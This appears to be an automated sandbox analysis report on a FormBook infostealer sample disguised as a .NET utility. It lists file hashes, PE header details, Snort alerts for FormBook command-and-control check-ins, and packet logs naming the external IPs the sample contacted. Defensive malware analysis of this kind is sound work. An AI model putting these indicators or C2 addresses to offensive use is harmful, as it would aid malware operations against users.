                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.871178969852065
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:350969bc_by_Libranalysis.exe
                                                                  File size:924672
                                                                  MD5:350969bc82ec33af12acf100c41eb4d1
                                                                  SHA1:f17d5fc8bad55cc2b523173b43585e9edb9154e4
                                                                  SHA256:961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
                                                                  SHA512:ae62d62e5e71b01a45322dd22eb4a5496b9a96b6443fc8759cd747695565d9e6b65f84da25b44239b65b15e8d615fa0bc8cd94a82351e6f18872d1fc6ee2c506
                                                                  SSDEEP:24576:rcM+tfU+NVmFr2wNV1KEjcZI30ziIwVU:rKgFzNjKEYOEWIwV
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....!................P..............0... ...@....@.. ....................................@................................

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x4e30d2
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x909C21C3 [Sun Nov 18 10:56:03 2046 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe3080 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe4000 | 0x5b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xe3064 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xe10d8 | 0xe1200 | False | 0.910015269295 | data | 7.87688083082 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0xe4000 | 0x5b4 | 0x600 | False | 0.422526041667 | data | 4.09985063561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xe6000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0980041756627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xe4090 | 0x324 | data | |
RT_MANIFEST | 0xe43c4 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

Imports

DLL | Import
mscoree.dll | _CorExeMain

Version Infos

Description | Data
Translation | 0x0000 0x04b0
LegalCopyright | Copyright 2019
Assembly Version | 1.0.0.0
InternalName | TextInfo.exe
FileVersion | 1.0.0.0
CompanyName |
LegalTrademarks |
Comments |
ProductName | WinFormBlur
ProductVersion | 1.0.0.0
FileDescription | WinFormBlur
OriginalFilename | TextInfo.exe

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/12/21-15:47:49.762126 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.4 | 34.102.136.180
05/12/21-15:47:49.762126 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.4 | 34.102.136.180
05/12/21-15:47:49.762126 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.4 | 34.102.136.180
05/12/21-15:47:49.899209 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49752 | 34.102.136.180 | 192.168.2.4
05/12/21-15:48:07.924397 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 103.15.186.68
05/12/21-15:48:07.924397 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 103.15.186.68
05/12/21-15:48:07.924397 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49764 | 80 | 192.168.2.4 | 103.15.186.68
05/12/21-15:48:24.329476 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49768 | 185.53.177.53 | 192.168.2.4
05/12/21-15:48:29.463149 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 23.227.38.74
05/12/21-15:48:29.463149 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 23.227.38.74
05/12/21-15:48:29.463149 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49770 | 80 | 192.168.2.4 | 23.227.38.74
05/12/21-15:48:29.644690 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49770 | 23.227.38.74 | 192.168.2.4
05/12/21-15:48:35.011543 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.4 | 192.64.147.164
05/12/21-15:48:35.011543 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.4 | 192.64.147.164
05/12/21-15:48:35.011543 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49771 | 80 | 192.168.2.4 | 192.64.147.164

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 15:47:49.720372915 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 15:47:49.761607885 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 15:47:49.761939049 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 15:47:49.762125969 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 15:47:49.803127050 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 15:47:49.899209023 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 15:47:49.899231911 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 15:47:49.899401903 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 15:47:49.899447918 CEST | 49752 | 80 | 192.168.2.4 | 34.102.136.180
May 12, 2021 15:47:49.940536022 CEST | 80 | 49752 | 34.102.136.180 | 192.168.2.4
May 12, 2021 15:47:55.323738098 CEST | 49762 | 80 | 192.168.2.4 | 119.81.45.82
May 12, 2021 15:47:55.530555010 CEST | 80 | 49762 | 119.81.45.82 | 192.168.2.4
May 12, 2021 15:47:55.530677080 CEST | 49762 | 80 | 192.168.2.4 | 119.81.45.82
May 12, 2021 15:47:55.530891895 CEST | 49762 | 80 | 192.168.2.4 | 119.81.45.82
May 12, 2021 15:47:55.737502098 CEST | 80 | 49762 | 119.81.45.82 | 192.168.2.4
May 12, 2021 15:47:56.787616014 CEST | 49762 | 80 | 192.168.2.4 | 119.81.45.82
May 12, 2021 15:47:56.996212006 CEST | 80 | 49762 | 119.81.45.82 | 192.168.2.4
May 12, 2021 15:47:56.996391058 CEST | 49762 | 80 | 192.168.2.4 | 119.81.45.82
May 12, 2021 15:48:01.872087955 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.004753113 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.004889011 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.005036116 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.137639046 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140299082 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140330076 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140355110 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140372038 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140397072 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140419006 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140440941 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140460968 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.140465021 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140486956 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140507936 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.140568018 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.140605927 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.140696049 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.272782087 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272820950 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272845030 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272866011 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.272867918 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272891045 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272900105 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.272916079 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272938013 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272945881 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.272959948 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.272970915 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.272981882 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273005009 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273005962 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273026943 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273040056 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273050070 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273070097 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273071051 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273097992 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273116112 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273119926 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273139954 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273152113 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273159981 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273179054 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:02.273180962 CEST | 80 | 49763 | 198.185.159.144 | 192.168.2.4
May 12, 2021 15:48:02.273216009 CEST | 49763 | 80 | 192.168.2.4 | 198.185.159.144
May 12, 2021 15:48:07.568507910 CEST | 49764 | 80 | 192.168.2.4 | 103.15.186.68
May 12, 2021 15:48:07.923923969 CEST | 80 | 49764 | 103.15.186.68 | 192.168.2.4
May 12, 2021 15:48:07.924217939 CEST | 49764 | 80 | 192.168.2.4 | 103.15.186.68
May 12, 2021 15:48:07.924396992 CEST | 49764 | 80 | 192.168.2.4 | 103.15.186.68
May 12, 2021 15:48:08.275038004 CEST | 80 | 49764 | 103.15.186.68 | 192.168.2.4
May 12, 2021 15:48:08.279015064 CEST | 80 | 49764 | 103.15.186.68 | 192.168.2.4
May 12, 2021 15:48:08.279042006 CEST | 80 | 49764 | 103.15.186.68 | 192.168.2.4
May 12, 2021 15:48:08.279299974 CEST | 49764 | 80 | 192.168.2.4 | 103.15.186.68
May 12, 2021 15:48:08.279356003 CEST | 49764 | 80 | 192.168.2.4 | 103.15.186.68
May 12, 2021 15:48:08.637468100 CEST | 80 | 49764 | 103.15.186.68 | 192.168.2.4
May 12, 2021 15:48:13.561913967 CEST | 49765 | 80 | 192.168.2.4 | 51.222.80.112
May 12, 2021 15:48:13.697118998 CEST | 80 | 49765 | 51.222.80.112 | 192.168.2.4
May 12, 2021 15:48:13.697252989 CEST | 49765 | 80 | 192.168.2.4 | 51.222.80.112
May 12, 2021 15:48:13.697396994 CEST | 49765 | 80 | 192.168.2.4 | 51.222.80.112
May 12, 2021 15:48:13.828573942 CEST | 80 | 49765 | 51.222.80.112 | 192.168.2.4
May 12, 2021 15:48:13.830612898 CEST | 80 | 49765 | 51.222.80.112 | 192.168.2.4
May 12, 2021 15:48:13.830630064 CEST | 80 | 49765 | 51.222.80.112 | 192.168.2.4
May 12, 2021 15:48:13.831099033 CEST | 49765 | 80 | 192.168.2.4 | 51.222.80.112
May 12, 2021 15:48:13.831171989 CEST | 49765 | 80 | 192.168.2.4 | 51.222.80.112
May 12, 2021 15:48:13.961436033 CEST | 80 | 49765 | 51.222.80.112 | 192.168.2.4
May 12, 2021 15:48:18.927031994 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:19.007870913 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.008023977 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:19.008239031 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:19.089050055 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092015982 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092034101 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092042923 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092062950 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092201948 CEST | 80 | 49766 | 81.88.52.88 | 192.168.2.4
May 12, 2021 15:48:19.092216969 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:19.092283010 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:19.092397928 CEST | 49766 | 80 | 192.168.2.4 | 81.88.52.88
May 12, 2021 15:48:24.203677893 CEST | 49768 | 80 | 192.168.2.4 | 185.53.177.53
May 12, 2021 15:48:24.244183064 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:24.244268894 CEST | 49768 | 80 | 192.168.2.4 | 185.53.177.53
May 12, 2021 15:48:24.287178040 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:24.287259102 CEST | 49768 | 80 | 192.168.2.4 | 185.53.177.53
May 12, 2021 15:48:24.329449892 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:24.329476118 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:24.329494953 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:24.329703093 CEST | 49768 | 80 | 192.168.2.4 | 185.53.177.53
May 12, 2021 15:48:24.329817057 CEST | 49768 | 80 | 192.168.2.4 | 185.53.177.53
May 12, 2021 15:48:24.370309114 CEST | 80 | 49768 | 185.53.177.53 | 192.168.2.4
May 12, 2021 15:48:29.421772003 CEST | 49770 | 80 | 192.168.2.4 | 23.227.38.74
May 12, 2021 15:48:29.462800980 CEST | 80 | 49770 | 23.227.38.74 | 192.168.2.4
May 12, 2021 15:48:29.462917089 CEST | 49770 | 80 | 192.168.2.4 | 23.227.38.74
May 12, 2021 15:48:29.463149071 CEST | 49770 | 80 | 192.168.2.4 | 23.227.38.74
May 12, 2021 15:48:29.504053116 CEST | 80 | 49770 | 23.227.38.74 | 192.168.2.4
                                                                  May 12, 2021 15:48:29.644690037 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644754887 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644808054 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644862890 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644882917 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.644918919 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644934893 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.644958019 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.644994020 CEST804977023.227.38.74192.168.2.4
                                                                  May 12, 2021 15:48:29.645020008 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.645047903 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:29.645144939 CEST4977080192.168.2.423.227.38.74
                                                                  May 12, 2021 15:48:34.837297916 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.011116028 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.011254072 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.011543036 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.228281975 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250890970 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250931025 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.250950098 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:35.251156092 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.251257896 CEST4977180192.168.2.4192.64.147.164
                                                                  May 12, 2021 15:48:35.423161983 CEST8049771192.64.147.164192.168.2.4
                                                                  May 12, 2021 15:48:40.368484020 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.409147024 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.409346104 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.409845114 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.450514078 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.450537920 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.450547934 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:40.451900959 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.451927900 CEST4977280192.168.2.4192.0.78.24
                                                                  May 12, 2021 15:48:40.492644072 CEST8049772192.0.78.24192.168.2.4
                                                                  May 12, 2021 15:48:45.524482965 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.565601110 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.566040039 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.566056013 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.606976986 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607007027 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607013941 CEST804977352.58.78.16192.168.2.4
                                                                  May 12, 2021 15:48:45.607312918 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.607326984 CEST4977380192.168.2.452.58.78.16
                                                                  May 12, 2021 15:48:45.651376009 CEST804977352.58.78.16192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 12, 2021 15:46:36.814066887 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:36.864743948 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:37.713713884 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:37.762743950 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:38.796724081 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:38.845554113 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:39.592092037 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:39.652911901 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:42.303510904 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:42.355633020 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:43.388578892 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:43.440186977 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:45.350935936 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:45.402674913 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:46.534737110 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:46.586438894 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:47.748987913 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:47.801074982 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:49.071911097 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:49.120729923 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:50.282104015 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:50.331032991 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:51.485450029 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:51.544975042 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:52.761302948 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:52.810089111 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:53.900584936 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:53.949546099 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:54.826957941 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:54.880492926 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:55.795959949 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:55.844654083 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:56.894179106 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:56.944658041 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:46:58.453923941 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:46:58.505796909 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
May 12, 2021 15:47:00.779433966 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
May 12, 2021 15:47:00.829524994 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
